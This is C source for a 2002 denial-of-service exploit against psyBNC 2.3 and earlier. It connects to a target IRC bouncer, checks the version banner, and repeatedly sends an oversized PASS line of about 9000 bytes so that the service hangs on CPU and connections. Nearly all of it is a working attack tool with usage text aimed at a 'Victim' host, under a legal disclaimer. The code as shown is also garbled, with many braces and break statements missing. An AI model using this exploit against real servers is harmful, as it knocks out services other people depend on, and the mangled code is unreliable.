* psyBNC <= 2.3 DoS
* Information System Advancement in Penetration (ISAP) Labs
* By Lunar Fault [ElectronicSouls]
* (C) May 19, 2002
* Legal Notice:
* In no way is ElectronicSouls, ISAP, or the author responsible for the
* actions or usage of this program. The author retains all copyrights to the
* contents within includeing this banner, except for the resolvenametoip()
* function. This source is not to be used for illegal purposes. Please check
* your local laws before testing this proof of concept.
* Description:
* Problem dealing with over sized passwords. Once the DoS has been sent the
* victim's psybnc's pid slowly begins to eat up cpu usage. This also results
* in the fact that psybnc holds the connection with a TIME_WAIT further denying
* access to the bnc. If you try and exploit the server more times than it allows
* connections in force mode. The result will be a Broken Pipe, in standard mode it
* will tell you the server is not vuln.
* es 11805 99.7 1.9 2672 1216 pts/1 R 06:28 19:17 ./psybnc
* Tested on psyBNC2.3, psyBNC2.2.1, psyBNC2.1.1
* Succefully exploited on Linux x86, and OpenBSD 3.0 x86.
* Lunar Fault
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <getopt.h>
#include <unistd.h>
#include <string.h>
#define SIZE 9000
#define PORT 31337
#define USER "pr0ix"
int senddos(int port, int size, char *target, char *user);
int checkvuln(char *rxbuf);
int testvuln(int port, char *target);
unsigned long resolvenametoip(char *name);
void usage(char *prog);
int checked = 0;
int force;
int main(int argc, char *argv[])
int c, i, z;
int port, size, times;
int u_t = 0, d_t = 0, n_t = 0, p_t = 0, s_t = 0, t_t;
char target[1024], *user;
printf("[+] ES psyBNC <= 2.3 DoS\n");
printf("[+] Information System Advancement in Penetration (ISAP) Labs\n");
printf("[+] By: Lunar Fault [ElectronicSouls]\n");
if(argc < 2) { usage(argv[0]);}
while ((c = getopt (argc, argv, "d:n:p:s:u:hft"))!=EOF) {
switch(c) {
case 'h':
case 'f':
force = 1;
case 'd':
strncpy(target, optarg, sizeof(target));
d_t = 1;
case 'n':
times = atoi(optarg);
n_t = 1;
case 'p':
port = atoi(optarg);
p_t = 1;
case 's':
size = atoi(optarg);
s_t = 1;
case 't':
t_t = 1;
case 'u':
user = (char *) malloc(strlen(optarg));
memcpy(user, optarg, strlen(optarg));
u_t = 1;
if (d_t == 0) { usage(argv[0]); }
if (n_t == 0) times = 3;
if (p_t == 0) port = PORT;
if (s_t == 0) size = SIZE;
if (u_t == 0) {
user = (char *) malloc(strlen(USER));
memcpy(user, USER, strlen(USER));
printf("[*] Victim: %s\n", target);
printf("[*] Port: %d\n", port);
printf("[*] User: %s\n", user);
printf("[*] Size: %d\n", size);
printf("[*] Times: %d\n", times);
if (t_t == 1) {
printf("[*] Testing for vulnerability\n");
z = testvuln(port, target);
if (z == -1) {
printf("[!] Failed to test Vuln!\n");
return 0;
if (force == 1)
printf("[*] Forceing DoS\n");
for (i = 0; i < times; i++) {
z = senddos(port, size, target, user);
if (z == -1) {
printf("[!] Failed on sending DoS!\n");
printf("[*] DoS sent %d times\n\n", times);
return 0;
int senddos(int port, int size, char *target, char *user)
int i, s, z, len_inet;
unsigned long ipaddr;
char *dosbuf, tmpbuf[128], *passbuf, rxbuf[1024];
struct sockaddr_in victim;
if (!(ipaddr = resolvenametoip(target))) {
printf("[!] Failed to resolve '%s'\n", target);
victim.sin_family = AF_INET;
victim.sin_port = htons(port);
victim.sin_addr.s_addr = ipaddr;
len_inet = sizeof(victim);
s = socket(PF_INET, SOCK_STREAM, 0);
if (s < 0) {
printf("[!] Failed to open socket!\n");
z = connect(s, (struct sockaddr *)&victim, len_inet);
if (z < 0) {
printf("[!] Connection refused!\n");
z = read(s, rxbuf, sizeof(rxbuf));
if (z == -1) {
printf("[!] Failed on read!\n");
z = checkvuln(rxbuf);
if (z == -1) {
printf("[!] Failed on vuln check!\n");
snprintf(tmpbuf, sizeof(tmpbuf), "NICK %s\n\r", user);
z = write(s, tmpbuf, strlen(tmpbuf));
if (z == -1) {
printf("[!] Failed on write!\n");
z = read(s, rxbuf, sizeof(rxbuf));
if (z == -1) {
printf("[!] Failed on read!\n");
passbuf = (char *) malloc(size);
for (i = 0; i < size; i++)
*(char *) &passbuf[i] = "A";
dosbuf = (char *) malloc(7 + strlen(passbuf));
memcpy(dosbuf, "PASS ", 5);
memcpy(dosbuf+5, passbuf, strlen(passbuf));
memcpy(dosbuf+5+strlen(passbuf), "\n\r", 2);
z = write(s, dosbuf, strlen(dosbuf));
if (z == -1) {
printf("[!] Failed on write!\n");
return 0;
int checkvuln(char *rxbuf)
int vuln_t;
char *bnc;
sprintf(&rxbuf[strlen(rxbuf)-2], 0);
if (force == 1) {return 0;}
if (checked == 1) { return 0;}
printf("[?] Server returned: %s\n", rxbuf);
if (bnc = strstr(rxbuf, "psyBNC2.")) {
if (strcasecmp(&bnc[9], ".") > 0) {
vuln_t = 1;
if ((int)(bnc[8] - '0') <= 3) {
if ((int)(bnc[8] - '0') == 3 && vuln_t == 1) {
printf("[!] Server is NOT VULN!\n");
printf("[*] Server is VULN!!\n");
} else {
printf("[!] Server is NOT VULN!\n");
} else {
printf("[!] Server is NOT VULN!\n");
checked = 1;
return 0;
int testvuln(int port, char *target)
int s, z, len_inet;
unsigned long ipaddr;
char rxbuf[1024];
struct sockaddr_in victim;
if (!(ipaddr = resolvenametoip(target))) {
printf("[!] Failed to resolve '%s'\n", target);
victim.sin_family = AF_INET;
victim.sin_port = htons(port);
victim.sin_addr.s_addr = ipaddr;
len_inet = sizeof(victim);
s = socket(PF_INET, SOCK_STREAM, 0);
if (s < 0) {
printf("[!] Failed to open socket!\n");
z = connect(s, (struct sockaddr *)&victim, len_inet);
if (z < 0) {
printf("[!] Connection refused!\n");
z = read(s, rxbuf, sizeof(rxbuf));
if (z == -1) {
printf("[!] Failed on read!\n");
z = checkvuln(rxbuf);
if (z == -1) {
printf("[!] Failed on vuln check!\n");
return 0;
unsigned long resolvenametoip(char *name)
struct hostent *host;
unsigned long addr;
if ((addr = inet_addr(name)) == -1) {
if (!(host = gethostbyname(name))) return 0;
else addr = *((unsigned long*)host->h_addr);
return addr;
void usage(char *prog)
printf("usage: %s [options]\n", prog);
printf("\t-d <target> Server hosting psybnc [REQUIRED]\n");
printf("\t-f force Skip vuln checking\n");
printf("\t-h help Your looking at it\n");
printf("\t-n <number> Number of times to attack Default: 3\n");
printf("\t-p <port> Port to connect to Default: 31337\n");
printf("\t-s <size> Size of password to send Default: 9000\n");
printf("\t-t test Tests for vuln\n");
printf("\t-u <user> User to login with Default: pr0ix\n\n");